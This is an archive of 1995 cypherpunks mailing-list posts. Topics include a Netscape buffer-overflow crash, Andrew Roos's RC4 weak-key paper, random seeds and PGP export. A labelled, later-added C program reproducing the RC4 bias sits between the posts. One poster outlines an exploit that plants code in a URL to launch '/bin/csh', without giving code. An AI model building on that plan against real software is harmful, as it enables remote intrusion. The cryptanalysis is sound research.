etc.) --- Concurrent VLSI Arch. Group 545 Technology Sq., Rm.
610 MIT AI Lab Cambridge, MA 02139 (617)-253-0972 (To subscribe to ecm, send email to ecm-request at ai.mit.edu with the word subscribe in the body. A digest version is available at ecm-digest-request.)

From patrick at Verity.COM Fri Sep 22 08:15:47 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 08:15:47 PDT Subject: Exchange random numbers (was: Re: netscape's response) Message-ID: <9509221511.AA19305@cantina.verity.com>
> > This isn't a problem as I see it, he'll only know what bits he > flipped, not the actual state. Wouldn't even know that if you permuted it. You _could_ use a fixed permutation, or you could use input information from another source to select the permutation. Even something as simple as taking 5 bits from one source and using another source mod(random seed length) to decide where to xor it into the random seed. (Rotating back to the front if needed, or you could let the bits fall off the end.) And if all you ever give out to randomness partners is the result of a good hash there's no way they could ever determine anything from it, or determine what effect their contribution had. Shoot, they wouldn't know if their contribution went into the seed, or merely affected how someone else's contribution went into the seed. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc.
\\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/

From pdlamb at iquest.com Fri Sep 22 08:15:53 1995 From: pdlamb at iquest.com (Patrick Lamb) Date: Fri, 22 Sep 95 08:15:53 PDT Subject: Another Netscape Bug (and possible security hole) Message-ID: <199509221515.KAA01511@vespucci.iquest.com>
HotJAVA apparently doesn't suffer from this bug, at least the 1.03 Alpha NT version. On the other hand, HotJava does truncate the URL to fit in its window. (I suppose I could try a very large screen with a very small font, just to make sure -- anyone willing to donate a 19" screen or bigger?) Pat

From patrick at Verity.COM Fri Sep 22 08:23:07 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 08:23:07 PDT Subject: Seeds which depend on machine states Message-ID: <9509221519.AA19310@cantina.verity.com>
> > Miguel Diaz writes: > > It is my suspicion that seeds which depend on machine > > states(ie state of your computer at a specific instance of > > time) would always be subject to scrutiny and de-cryption. > > As long as the software used to encrypt is not self-modifying, > > the machine state can (through careful manipulation involving > > temperature, clocks, processes etc)always be replicated and > > fixed to an acceptable degree.
> > Try getting a human to type with the same timing, to microsecond > precision, the same way twice. > That assumes that you have some way of measuring the timing to microsecond precision. On most machines I've been on, if you get something time-stamped, even if there is a microsecond portion of the timestamp it's meaningless because it wasn't based on a timer with the required precision. If a timer can only resolve milliseconds, the microseconds don't have any meaning. Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/

From patrick at Verity.COM Fri Sep 22 08:35:52 1995 From: patrick at Verity.COM (Patrick Horgan) Date: Fri, 22 Sep 95 08:35:52 PDT Subject: "random" number seeds vs. Netscape Message-ID: <9509221532.AA19315@cantina.verity.com>
> > Nor is there anything inherently wrong with having sex without the use > of a condom. YES! Safe exec! Use software protection;) (Can you tell that when I read this I was LOL!?) > > However, it is very difficult -- VERY DIFFICULT -- to prove to > yourself that there is never an instance in which your system() or > popen() can be abused. Well...you can tell by looking, certainly that's not true when you need a condom;) > In any case, I find it's often more prudent just > to strip all these things out of my code. If you don't use them, you > don't have to prove they are done properly. Paranoia is your > friend. No one can ever break you for doing something you don't do. That's true, I have to admit that I usually don't use them either.
Once you know how they're coded up, and how little code is actually used, it seems silly anyway to call a popen or system and suffer the overhead of the function calls and the loss of control. > > > The problem arises when you use information given to you from > > outside as the argument to popen or system without checking it. > > Yup, but often, you'd be surprised what turns out to be outside data. You're singing to the choir. Sigh, Eric Allman's been several times surprised about what turned out to be outside data. > > In any case, you obviously also understand why this is bad, but I hope > that people out there understand -- always make sure that you are > double extra careful about the use of such calls. Thanks:) Patrick _______________________________________________________________________ / These opinions are mine, and not Verity's (except by coincidence;). \ | (\ | | Patrick J. Horgan Verity Inc. \\ Have | | patrick at verity.com 1550 Plymouth Street \\ _ Sword | | Phone : (415)960-7600 Mountain View \\/ Will | | FAX : (415)960-7750 California 94303 _/\\ Travel | \___________________________________________________________\)__________/

From dhenson at itsnet.com Fri Sep 22 08:42:57 1995 From: dhenson at itsnet.com (Don Henson) Date: Fri, 22 Sep 95 08:42:57 PDT Subject: Munition (RSA/Perl) T-shirts Now Shipping From Stock! Message-ID: <199509221557.JAA23019@scratchy.itsnet.com>
By now, everyone knows about the TSHIRT that has been classified as a MUNITION by the US Government. If you don't know, just send email to wepinsto at colossus.net with a subject of 'TSHIRT STORY' and you will receive full details via return email. We have thus far shipped over 850 of the RSA/Perl Munition T-shirts and are now in a position to ship most orders from stock. You no longer have to pay your money and wait for months to get your t-shirt while someone else collects interest on YOUR money. We (WEPIN Store) can ship your t-shirt within two weeks of receiving your order.
Orders are still pouring in. Don't be left out. Order yours today. (Read some comments of our customers at the end of this post.) For more information on how to own this classic example of civil disobedience, just send email to wepinsto at colossus.net with the subject of 'SHIRT'. (You don't have to be a US/Canadian citizen to request the info.) Or, if you have WWW access, just point your Web browser to: http://colossus.net/wepinsto/wshome.html By the way, 25% of the profits from the sale of the tshirt (in the US/Canada) goes to the PHIL ZIMMERMANN LEGAL DEFENSE FUND to help defend the author of PGP from harassment and possible prosecution by the Fedgoons. And if you get arrested for wearing the Munitions Tshirt, we'll refund your purchase price. :-) ====++++====++++ Here are some testimonials from a few of our many satisfied customers: "Got mine this afternoon. Wooohhaah!! Already had some folks at Blockbusters point, mumble to themselves, and then ask me what the munitions warning meant. This is going to be fun!! I'm a cyphernerd for sure..." "Thanks for the great T-shirt. I'm making copies of your paper order form for others." "I think I'll have to wear the shirt over to Logan Airport and hang around the International Arrivals terminal a few times. " "I received the T-shirt on 8/3. Thank you, it has been a pleasure dealing with you!" "The first thing that I did after it arrived was to don it and then go visit the office of one of our visiting researchers from Russia. :)~" ====++++====++++ Get your Munitions Tshirt now. Who knows how long they'll stay in production!
Don Henson, Managing Director (PGP Key ID = 0X03002DC9) West El Paso Information Network (WEPIN) email: wepinsto at colossus.net Check out The WEPIN Store at URL: http://colossus.net/wepinsto/wshome.html From michaelh at Informatik.Uni-Bremen.DE Fri Sep 22 08:53:02 1995 From: michaelh at Informatik.Uni-Bremen.DE (Michael Hortmann) Date: Fri, 22 Sep 95 08:53:02 PDT Subject: new source of PGP sourcecode Message-ID: <199509221554.RAA22108@bettina.informatik.uni-Bremen.de> Michael Hortmann Dept. of Mathematics University of Bremen michaelh at informatik.uni-Bremen.de PGP public key by finger ____________ Reconstructing PGP 2.6.1 Sourcecode by Scanning and OCR'ing the MIT-Press Book It has always been somewhat awkward to produce legal versions of PGP outside the US, requiring a lot of extra work. Recently, MIT-Press published the book Philip Zimmermann PGP Source Code and Internals which can be purchased in any bookstore. In the foreword it is mentioned that this book may not be exportable, because it has not been granted a "Commodities Jurisdiction" (CJ) by the US State Department. However, the international book distributors don't seem to take notice of that. Presently, I'm trying to find out what the legal status of the book may be in Germany, if it would be legitimate to request me to destroy it, or if on the contrary I can legally extract its contents and publish the result on the Internet. In the meantime I have asked some of my students to scan the book. This has already been accomplished, resulting in about 150MB image files. Right now the OCR process is on its way; by looking at samples we are optimistic that most mistakes will be found and corrected by a semiautomatic editing process; what mistakes remain should be detected by the compiler. 
As we will keep the image files, the original OCR files, the awk-scripts and
intermediate files of the editing process, there can be no doubt that the final
sourcecode has resulted from the book, and not from an illegal ftp. Each file
will be marked as of this origin.

When I'm convinced of the legality of this course of action, I will give notice
on the Net and deposit the final product and the intermediate files under
appropriate names in ftp://ftp.uni-Bremen.de/pub/security/crypt/

For the Net-community it may be interesting to know now that such a project is
on its way.
_______

From patrick at Verity.COM Fri Sep 22 09:07:49 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:07:49 PDT
Subject: Executing code on the stack, was Re: netscape bug
Message-ID: <9509221604.AA19341@cantina.verity.com>

> very big, and you can do what you like. The 8lgm people wrote a demo
> for Sparc as a proof of concept.

It's worth mentioning that 8lgm (Eight little green men;) has recently changed
their policy on how long they wait to make exploit scripts available. It has
resonance with what's happened here on cypherpunks lately. They used to publish
that there was a hole, but would hold up quite a while on making the exploit
scripts available. They were trying to make it safer for manufacturers and give
them time to make fixes available first. What actually happened is that
manufacturers would put the fixes on the backburner, and often not get around
to them at all. 8lgm found that publishing the exploit scripts usually resulted
in quick fixes from the vendors. Now the exploitation details are available
quite quickly.

Patrick
 _______________________________________________________________________
/ These opinions are mine, and not Verity's (except by coincidence;).   \
| (\                                                                    |
|  Patrick J. Horgan        Verity Inc.                                 |
|  \\  Have                 patrick at verity.com   1550 Plymouth Street |
|   \\ _ Sword              Phone : (415)960-7600  Mountain View        |
|    \\/ Will               FAX   : (415)960-7750  California 94303     |
|   _/\\ Travel                                                         |
\___________________________________________________________\)__________/

From patrick at Verity.COM Fri Sep 22 09:14:15 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:14:15 PDT
Subject: Another Netscape Bug (and possible security hole)
Message-ID: <9509221610.AA19346@cantina.verity.com>

> > [I hear Perry in the background groaning and muttering "I told you so"]
> These buffer overflow bugs should be taught in every programming
> 101 course along with fencepost errors.
>
> I'm not even sure if I want to write the obligatory program to exploit
> the hack given that some malicious jerk would probably use it
> on his home page to attack people.
>

You should consider that there are people with a lot of expertise that are
constantly on the lookout for things like this. I would bet a nickel to a donut
that many people in the cracker community discovered this a long time ago and
that exploit code was written long ago. How many people logged in as root use
netscape? If the source was available we'd have told them about this long ago.

Patrick

From patrick at Verity.COM Fri Sep 22 09:30:49 1995
From: patrick at Verity.COM (Patrick Horgan)
Date: Fri, 22 Sep 95 09:30:49 PDT
Subject: Reformatted Weak Keys in RC4 for readability.
Message-ID: <9509221627.AA19355@cantina.verity.com>

I modified only the formatting to get rid of the wrap...I did it so that I
could enjoy reading it and I send it in to y'all so you won't have to do it as
well...it's a wonderful paper.

Patrick


                A CLASS OF WEAK KEYS IN THE RC4 STREAM CIPHER
                             PRELIMINARY DRAFT

                                ANDREW ROOS
                        VIRONIX SOFTWARE LABORATORIES

1. INTRODUCTION

This paper discusses a class of weak keys in RSA's RC4 stream cipher. It shows
that for at least 1 out of every 256 possible keys the initial byte of the
pseudo-random stream generated by RC4 is strongly correlated with only a few
bytes of the key, which effectively reduces the work required to exhaustively
search RC4 key spaces.

2. STATE TABLE INITIALIZATION IN RC4

Although the RC4 algorithm has not been published by RSA Data Security, source
code to implement the algorithm was anonymously posted to the Cypherpunks
mailing list several months ago. The success of the Cypherpunks' brute-force
attack on SSL with a 40-bit key indicates that the source code published did
accurately implement RC4.

RC4 uses a variable length key from 1 to 256 bytes to initialize a 256-byte
state table which is used for the subsequent generation of pseudo-random bytes.
The state table is first initialized to the sequence {0,1,2,...,255}. Then:

    1  index1 = 0;
    2  index2 = 0;
    3
    4  for(counter = 0; counter < 256; counter++)
    5  {
    6      index2 = (key_data_ptr[index1] + state[counter] + index2) % 256;
    7      swap_byte(&state[counter], &state[index2]);
    8      index1 = (index1 + 1) % key_data_len;
    9  }

Note that the only line which directly affects the state table is line 7, when
two bytes in the table are exchanged. The first byte is indexed by "counter",
which is incremented for each iteration of the loop. The second byte is indexed
by "index2" which is a function of the key. Hence each element of the state
table will be swapped at least once (although possibly with itself), when it is
indexed by "counter". It may also be swapped zero, one or more times when it is
indexed by "index2".

If we assume for the moment that "index2" is a uniformly distributed
pseudo-random number, then the probability that a particular single element of
the state table will be indexed by "index2" at some time during the
initialization routine is:

    P = 1 - (255/256) ^ 255 = 0.631

(The exponent is 255 because we can disregard the case when "index2" and
"counter" both index the same element, since this will not affect its value.)

Conversely, there is a 37% probability that a particular element will _not_ be
indexed by "index2" during initialization, so its final value in the state
table will only be affected by a single swap, when it is indexed by "counter".
Since key bytes are used sequentially (starting again at the beginning when the
key is exhausted), this implies:

A.  Given a key length of K bytes, and E < K, there is a 37% probability that
    element E of the state table depends only on elements 0..E (inclusive) of
    the key. (This is approximate since "index2" is unlikely to be uniformly
    distributed.)

In order to make use of this, we need to determine the most likely values for
elements of the state table. Since each element is swapped at least once (when
it is indexed by "counter"), it is necessary to take into account the likely
effect of this swap. Swapping is a nasty non-linear process which is hard to
analyze. However, when dealing with the first few elements of the state table,
there is a high probability that the byte with which the element is swapped has
not itself been involved in any previous exchanges, and therefore retains its
initial value {0,1,2,...,255}. Similarly, when dealing with the first few
elements of the state table, there is also a significant probability that none
of the state elements added to index2 in line 6 of the algorithm has been
swapped either.

This means that the most likely value of an element in the state table can be
estimated by assuming that state[x] == x in the algorithm above. In this case,
the algorithm becomes:

    1  index1 = 0;
    2  index2 = 0;
    3
    4  for(counter = 0; counter < 256; counter++)
    5  {
    6      index2 = (key_data_ptr[index1] + counter + index2) % 256;
    7      state[counter] = index2;
    8      index1 = (index1 + 1) % key_data_len;
    9  }

Which can be reduced to:

B.  The most likely value for element E of the state table is:

        S[E] = X(E) + E(E+1)/2

    where X(E) is the sum of bytes 0..E (inclusive) of the key. (When
    calculating the sum of key elements, the key is considered to "wrap
    around" on itself.)

Given this analysis, we can calculate the probability for each element of the
state table that its value is the "most likely value" of B above. The easiest
way to do this is to evaluate the state tables produced from a number of
pseudo-randomly generated RC4 keys. The following table shows the results for
the first 47 elements from a trial of 100 000 eighty-bit RC4 keys:

    Element                     Probability (%)
    -------   -----------------------------------------------
     0- 7     37.0  36.8  36.2  35.8  34.9  34.0  33.0  32.2
     8-15     30.9  29.8  28.5  27.5  26.0  24.5  22.9  21.6
    16-23     20.3  18.9  17.3  16.1  14.7  13.5  12.4  11.2
    24-31     10.1   9.0   8.2   7.4   6.4   5.7   5.1   4.4
    32-39      3.9   3.5   3.0   2.6   2.3   2.0   1.7   1.4
    40-47      1.3   1.2   1.0   0.9   0.8   0.7   0.6   0.6

The table confirms that there is a significant correlation between the first
few values in the state table and the "likely value" predicted by B.

3. WEAK KEYS

The RC4 state table is used to generate a pseudo-random stream which is XORed
with the plaintext to give the ciphertext. The algorithm used to generate the
stream is as follows: x and y are initialized to 0. To generate each byte:

    1  x = (x + 1) % 256;
    2  y = (state[x] + y) % 256;
    3  swap_byte(&state[x], &state[y]);
    4  xorIndex = (state[x] + state[y]) % 256;
    5  GeneratedByte = state[xorIndex];

One way to exploit our analysis of the state table is to find circumstances
under which one or more generated bytes are strongly correlated with a small
subset of the key bytes. Consider what happens when generating the first byte
if state[1] == 1.

    1  x = (0 + 1) % 256;                    /* x == 1 */
    2  y = (state[1] + 0) % 256;             /* y == 1 */
    3  swap_byte(&state[1], &state[1]);      /* no effect */
    4  xorIndex = (state[1] + state[1]);     /* xorIndex = 2 */
    5  GeneratedByte = state[2]

And we know that state[2] has a high probability of being

    S[2] = K[0] + K[1] + K[2] + 2(2+1)/2

Similarly,

    S[1] = K[0] + K[1] + 1(1+1)/2

So to make it probable that S[1] == 1, we have:

    K[0] + K[1] == 0 (mod 256)

In which case the most likely value for S[2] is:

    S[2] = K[2] + 3

This allows us to identify a class of weak keys:

C.  Given an RC4 key K[0]..K[N] with K[0] + K[1] == 0 (mod 256), there is a
    significant probability that the first byte generated by RC4 will be
    K[2] + 3 (mod 256).

Note that there are two special cases, caused by "unexpected" swapping during
key generation. When K[0]==1, the "expected" output byte is K[2] + 2, and when
K[0]==2, the expected value is K[2] + 1.

There are a number of similar classes of "weak keys" which only affect a few
keys out of every 65536. However the particular symmetry in this class means
that it affects one key in 256, making it the most interesting instance.

Once again I took the easy way out and used simulation to determine the
approximate probability that result C holds for any given key. Probabilities
ranged between 12% and 16% depending on the values of K[0] and K[1], with a
mean of about 13.8%. All these figures are significantly greater than the 0.39%
which would be expected from an uncorrelated generator. The key length used was
again 80 bits.

This works the other way around as well: given the first byte B[0] generated by
a weak key, the probability that K[2]==B[0]-3 (mod 256) is 13.8%.

4. EXPLOITING WEAK KEYS IN RC4

Having found a class of weak keys, we need a practical way to attack RC4 based
cryptosystems using them. The most obvious way would be to search potential
weak keys first during an exhaustive attack. However since only one in every
256 keys is weak, the effective reduction in search space is not particularly
significant.

The usefulness of weak keys does increase if the opponent is satisfied with
recovering only a percentage of the keys subjected to analysis. Given a known
generator output which includes the first generated byte, one could assume that
the key was weak and search only the weak keys which would generate the known
initial byte. Since 1 in 256 keys is weak, and there is a 13.8% chance that the
assumed value of K[2] will be correct, there is only a 0.054% chance of finding
the key this way. However, you have reduced the search space by 16 bits due to
the assumed relationship between K[0] and K[1] and the assumed value of K[2],
so the work factor per key recovered is reduced by a factor of 35, which is
equivalent to reducing the effective key length by 5.1 bits.

However in particular circumstances, the known relationships between weak keys
may provide a much more significant reduction in workload. The remainder of
this section describes an attack which, although requiring very specific
conditions, illustrates the potential threat.

As a stream cipher, a particular RC4 key can only be used once. When multiple
communications sessions are required, some mechanism must be provided for
generating a new session key each time. Let us suppose that an implementation
chose the simple method of incrementing the previous session key to get the new
session key, and that the session key was treated as a "little endian" (least
significant byte first) integer for this purpose. We now have the interesting
situation that the session keys will "cycle through" weak keys in a pattern
which repeats every 2^16 keys:

    00 00 00 ...   Weak
                   (510 non-weak keys)
    FF 01 00 ...   Weak
                   (254 non-weak keys)
    FE 02 00 ...   Weak
                   (254 non-weak keys)
    FD 03 00 ...   Weak
    ...
    01 FF 00 ...   Weak
                   (254 non-weak keys)
    00 00 01 ...   Weak
                   (510 non-weak keys)
    FF 01 01 ...   Weak

    (Least significant byte on the left)

Now while an isolated weak key cannot be identified simply from a known
generator output, this cycle of weak keys at known intervals can be identified
using statistical techniques since each of the weak keys has a higher than
expected probability of generating the _same_ initial byte. This means that an
opponent who knew the initial generated bytes of about 2^16 session keys could
identify the weak keys, and would also be able to locate the 510-key gap
between successive cycles of weak keys (although not precisely).

Since the 510-key gap occurs immediately following a key which begins with
00 00, the opponent not only knows that the keys are weak, but also knows the
first two bytes of each key. The third byte of each key can be guessed from the
first output byte generated by the key, with a 13.8% chance of a correct guess.
Assuming that the "510-key gap" is narrowed down to 1 of 8 weak keys, the
attacker can search a key space which is 24 bits less than the size of the
session keys, with a 13.8%/8 chance of success, effectively reducing the key
space by approximately 18 bits.

Although this particular attack depends on a very specific set of
circumstances, it is likely that other RC4 based cryptosystems in which there
are linear relationships between successive session keys could be vulnerable
to similar attacks.

5. RECOMMENDATIONS

The attacks described in this algorithm result from inadequate "mixing" of key
bytes during the generation of the RC4 state table. The following measures
could be taken to strengthen cryptosystems based on the RC4 algorithm:

(a) After initializing the algorithm, generate and discard a number of bytes.
    Since the algorithm used to generate bytes also introduces additional
    non-linear dependencies into the state table, this would make analysis
    more difficult.

(b) In systems which require multiple session keys, ensure that session keys
    are not linearly related to each other.

(c) Avoid using the weak keys described.

6. CONCLUSION

This preliminary analysis of RC4 shows that the algorithm is vulnerable to
analytic attacks based on statistical analysis of its state table. It is likely
that a more detailed analysis of the algorithm will reveal more effective ways
to exploit the weaknesses described.

Andrew Roos


From rsalz at osf.org Fri Sep 22 10:04:27 1995
From: rsalz at osf.org (Rich Salz)
Date: Fri, 22 Sep 95 10:04:27 PDT
Subject: Defense against a class of programming bugs
Message-ID: <9509221703.AA22917@sulphur.osf.org>

In light of the continuing vulnerability to long user input, I humbly offer the
following aphorism, suitable for display on all Netscape programmer cubicles:

    Copy strings with strdup, not strcpy.

From yihchun at u.washington.edu Fri Sep 22 10:04:56 1995
From: yihchun at u.washington.edu (Yih-Chun Hu)
Date: Fri, 22 Sep 95 10:04:56 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID:

On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:

> Netscape 1.1N on a powermac crashes hard on that url.
> If anyone wants to try it out, I've put up a simple page with the url at

Netscape, Windows (it's a school computer) works fine w/ a proxy. When there is
no proxy, Windows dies. EMM dies. Lots of stuff dies. So use a proxy.

> http://www.redweb.com/experiment/bug.html
>
> *warning* view the source before you click on strange links!!!

Sometimes you won't expect it, i.e. for netscape enhancements click here (or on
the Netscape logo).

+---- Yih-Chun Hu (finger:yihchun at cs.washington.edu) ----------------------+
| http://www.cs.washington.edu/homes/yihchun     yihchun at cs.washington.edu |
| http://weber.u.washington.edu/~yihchun          yihchun at u.washington.edu |
+---- PGP Key Fingerprints (Keys by FINGER or on WWW) ---------------------+
| 1024/E50EC641   B2 A0 DE 9E 36 C0 EB A6   F9 3E D2 DD 2F 27 74 79          |
| 2047/DF0403F9   18 EB 62 C8 7F 06 04 67   42 76 24 E2 99 D1 07 DC          |
+--------------------------------------------------------------------------+

From rjc at clark.net Fri Sep 22 10:14:04 1995
From: rjc at clark.net (Ray Cromwell)
Date: Fri, 22 Sep 95 10:14:04 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To: <199509221236.IAA03762@frankenstein.piermont.com>
Message-ID: <199509221713.NAA11980@clark.net>

Perry writes:
> > These buffer overflow bugs should be taught in every programming
> > 101 course along with fencepost errors.
> >
> > I'm not even sure if I want to write the obligatory program to exploit
> > the hack given that some malicious jerk would probably use it
> > on his home page to attack people.
>
> The problem is that if you don't produce a (benign) exploit people
> aren't going to take it seriously enough.

Yeah, I guessed that. I'll work on it, I have a few doubts I have to research
first. For instance, how to embed code in the domain that 1) server/client
processing won't "cook" and 2) contains no isolated zero bytes which would null
terminate the string.
My current idea is to look in Netscape for an "exec" routine, and call it
passing a "/bin/csh" to it. Irregardless, it's a nasty bug given that you can
crash anyone's netscape. And on Mac/Win3.1, it may even require a reboot.

-Ray

From tedwards at Glue.umd.edu Fri Sep 22 10:18:08 1995
From: tedwards at Glue.umd.edu (Thomas Grant Edwards)
Date: Fri, 22 Sep 95 10:18:08 PDT
Subject: Another Netscape Bug (and possible security hole)
In-Reply-To:
Message-ID:

On Fri, 22 Sep 1995, Dietrich J. Kappe wrote:

> Netscape 1.1N on a powermac crashes hard on that url. If anyone wants to try
> it out, I've put up a simple page with the url at
> http://www.redweb.com/experiment/bug.html

Netscape also crashes (error 1) on regular Macs...sigh. I'm contacting someone
who just wrote a http server to see how tough it would be to drop some code on
the stack.

-Thomas

From ab411 at detroit.freenet.org Fri Sep 22 10:20:35 1995
From: ab411 at detroit.freenet.org (David R. Conrad)
Date: Fri, 22 Sep 95 10:20:35 PDT
Subject: (noise) Subject: Married with Children (was: Re: Netscape closes up 1 3/8 today!)
Message-ID: <199509221720.NAA17055@detroit.freenet.org>

Christopher J. Shaulis writes:

> Yeah. That's the way it works sometimes. I remember back when that
> housewife from Minnesota launched her media campaign to have "Married
> With Children" taken off the air. All it did was make the show a
> hundred times more popular and extend its life for years after it
> probably would have been canceled on its own.

Terry Rakolta is from Bloomfield Hills, Michigan, just a few short miles from
where I sit, typing at my keyboard. After being offended by the episode "Her
Cups Runneth Over", Rakolta took notes on things she found offensive in
subsequent episodes and then mailed a complaint to Fox. Fox's reaction?
According to executive producer Michael Moye, "Everybody did the manly thing
which was immediately dive behind desks and point the finger at us.
You couldn't get your legs under a desk for all the executives under there. You
have never seen such wussing. And we're going, 'One letter? *One letter?*'"
[emphasis his]

The resulting media incident almost certainly increased the show's ratings, but
it also brought the wrath of the Fox censor down on the producers. For an
interesting account of this, see Playboy, July 1990, (the one with Sharon Stone
topless on the cover ;), "Hanging out with the Bundys", Pamela Marin, p.114 et
seq.

Something else which has happened here in the Greater Detroit SMSA, just in the
last few days, is the mother of a ten year old boy has demanded that
_The_Stand_ by Stephen King be removed from the school's library after her son
checked it out from said library. Turns out Stephen included some graphic
descriptions of sex. The punch line, if you like, is that in tv news coverage
the young lad was shown sitting in front of the tv, playing a Mario-like video
game. Thank God they got that book away from him just in the nick of time, eh?
He might be reading even as we speak!

They walked still further and the girl said, "Is it true that long ago firemen
put fires *out* instead of going to start them?" "No."
        -- Ray Bradbury

``Officer, officer, arrest that man! He's whistling a dirty song.''
        -- Jean Ellison

Crypto relevance? None.

drc

--
David R. Conrad, conrad at detroit.freenet.org, http://www.grfn.org/~conrad
Hardware & Software Committee -- Finger conrad at grfn.org for public key
Key fingerprint = 33 12 BC 77 48 81 99 A5  D8 9C 43 16 3C 37 0B 50
No, his mind is not for rent to any god or government.
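Returning to the RC4 weak-key paper by Andrew Roos that Patrick Horgan reposted earlier in this thread: the following is an added example, not the paper's code and not from any post on the list. It rebuilds RC4 from the paper's pseudocode, reproduces results B and C by simulation, and then shows that recommendation (a), discarding initial keystream, removes the first-byte bias; the xorshift key generator, KEYLEN and all function names are constructed for this example.

```c
/* Added example, not code from the Roos paper or from any post in this thread.
 * RC4 rebuilt from the paper's pseudocode, used to measure result B (likely
 * early state values) and result C (weak-key first byte), and to show that
 * discarding initial keystream, recommendation (a), removes the bias. Keys come
 * from a small xorshift generator so runs repeat; none is real key material. */
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

#define KEYLEN 10   /* 80-bit keys, the length used in the paper's trials */

typedef struct { uint8_t s[256]; uint8_t x, y; } rc4_t;

/* Section 2 key schedule: state = {0..255}, then 256 key-driven swaps. */
static void rc4_init(rc4_t *r, const uint8_t *key, size_t keylen) {
    size_t index1 = 0; uint8_t index2 = 0, t;
    for (int i = 0; i < 256; i++) r->s[i] = (uint8_t)i;
    for (int i = 0; i < 256; i++) {
        index2 = (uint8_t)(key[index1] + r->s[i] + index2);
        t = r->s[i]; r->s[i] = r->s[index2]; r->s[index2] = t;
        index1 = (index1 + 1) % keylen;
    }
    r->x = 0; r->y = 0;
}

/* Section 3 byte generator. */
static uint8_t rc4_byte(rc4_t *r) {
    r->x = (uint8_t)(r->x + 1);
    r->y = (uint8_t)(r->s[r->x] + r->y);
    uint8_t t = r->s[r->x]; r->s[r->x] = r->s[r->y]; r->s[r->y] = t;
    return r->s[(uint8_t)(r->s[r->x] + r->s[r->y])];
}

/* Public RC4 test vector: key "Key" gives keystream EB 9F 77 81 B7 ...
 * (so "Plaintext" encrypts to BB F3 16 E8 D9 ...). Returns 1 on success. */
static int rc4_selftest(void) {
    static const uint8_t want[5] = {0xEB, 0x9F, 0x77, 0x81, 0xB7};
    rc4_t r;
    rc4_init(&r, (const uint8_t *)"Key", 3);
    for (int i = 0; i < 5; i++)
        if (rc4_byte(&r) != want[i]) return 0;
    return 1;
}

/* Result B: most likely state[E] is X(E) + E(E+1)/2, X(E) the wrapped key sum. */
static uint8_t likely_state(const uint8_t *key, size_t keylen, int e) {
    unsigned sum = 0;
    for (int i = 0; i <= e; i++) sum += key[i % keylen];
    return (uint8_t)(sum + (unsigned)(e * (e + 1) / 2));
}

/* Result C with its two special cases; returns -1 when the key is not weak. */
static int predicted_first_byte(const uint8_t *key) {
    if ((uint8_t)(key[0] + key[1]) != 0) return -1;
    if (key[0] == 1) return (uint8_t)(key[2] + 2);
    if (key[0] == 2) return (uint8_t)(key[2] + 1);
    return (uint8_t)(key[2] + 3);
}

/* Reproducible constructed key bytes (xorshift32); not a CSPRNG. */
static uint32_t rng_state = 0x9E3779B9u;
static uint8_t rng_byte(void) {
    rng_state ^= rng_state << 13; rng_state ^= rng_state >> 17; rng_state ^= rng_state << 5;
    return (uint8_t)(rng_state >> 24);
}

/* Fraction of random keys whose state[e] after the key schedule equals the
 * result-B estimate (the paper's table: 37.0% at e=0, 14.7% at e=20). */
static double state_hit_rate(int e, int trials) {
    uint8_t key[KEYLEN]; rc4_t r; int hits = 0;
    for (int n = 0; n < trials; n++) {
        for (int i = 0; i < KEYLEN; i++) key[i] = rng_byte();
        rc4_init(&r, key, KEYLEN);
        hits += (r.s[e] == likely_state(key, KEYLEN, e));
    }
    return (double)hits / trials;
}

/* Fraction of keys whose keystream byte number `discard` (0 = first byte)
 * equals the result-C guess. weak=1 forces K[0]+K[1]==0 (mod 256); weak=0
 * uses unrelated keys as a control, where only about 1/256 should hit. */
static double first_byte_hit_rate(int weak, int discard, int trials) {
    uint8_t key[KEYLEN]; rc4_t r; int hits = 0;
    for (int n = 0; n < trials; n++) {
        for (int i = 0; i < KEYLEN; i++) key[i] = rng_byte();
        if (weak) key[1] = (uint8_t)(0u - key[0]);
        int guess = weak ? predicted_first_byte(key) : (uint8_t)(key[2] + 3);
        rc4_init(&r, key, KEYLEN);
        for (int i = 0; i < discard; i++) (void)rc4_byte(&r);
        hits += (rc4_byte(&r) == guess);
    }
    return (double)hits / trials;
}

int main(void) {
    printf("RC4 self-test: %s\n", rc4_selftest() ? "ok" : "FAILED");
    printf("state[0] matches estimate B:      %5.1f%%\n", 100 * state_hit_rate(0, 100000));
    printf("weak key, first byte == K[2]+3:   %5.2f%%\n", 100 * first_byte_hit_rate(1, 0, 100000));
    printf("random key, first byte == K[2]+3: %5.2f%%\n", 100 * first_byte_hit_rate(0, 0, 100000));
    printf("weak key after 256 discarded:     %5.2f%%\n", 100 * first_byte_hit_rate(1, 256, 100000));
    return 0;
}
```

The weak-key rate should land near the paper's 13.8% while the control and the post-discard rate stay near 1/256, which is the whole argument for recommendation (a).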
From mjsus at atlanta.com Fri Sep 22 10:23:09 1995
From: mjsus at atlanta.com (mjsus at atlanta.com)
Date: Fri, 22 Sep 95 10:23:09 PDT
Subject: business intelligence or BI
Message-ID: <199509221726.NAA17033@atlanta.com>

>It's important here to distinguish economic "espionage" and economic
>"intelligence."
>

There is also the difference between the business intelligence and business
espionage! The business intelligence is used to collect, evaluate, analyze etc.
the business information and data that may include competitors, markets,
economic trends, suppliers among others. The sources of this information are
publicly and legally available for all companies and individuals. The formal or
informal business intelligence system can be used. The successful use of the
traditional business intelligence will result in the best results, when this
information and data is evaluated, analyzed and disseminated in the most
intelligent, reliable, timely and accurate manner. 100% of companies are
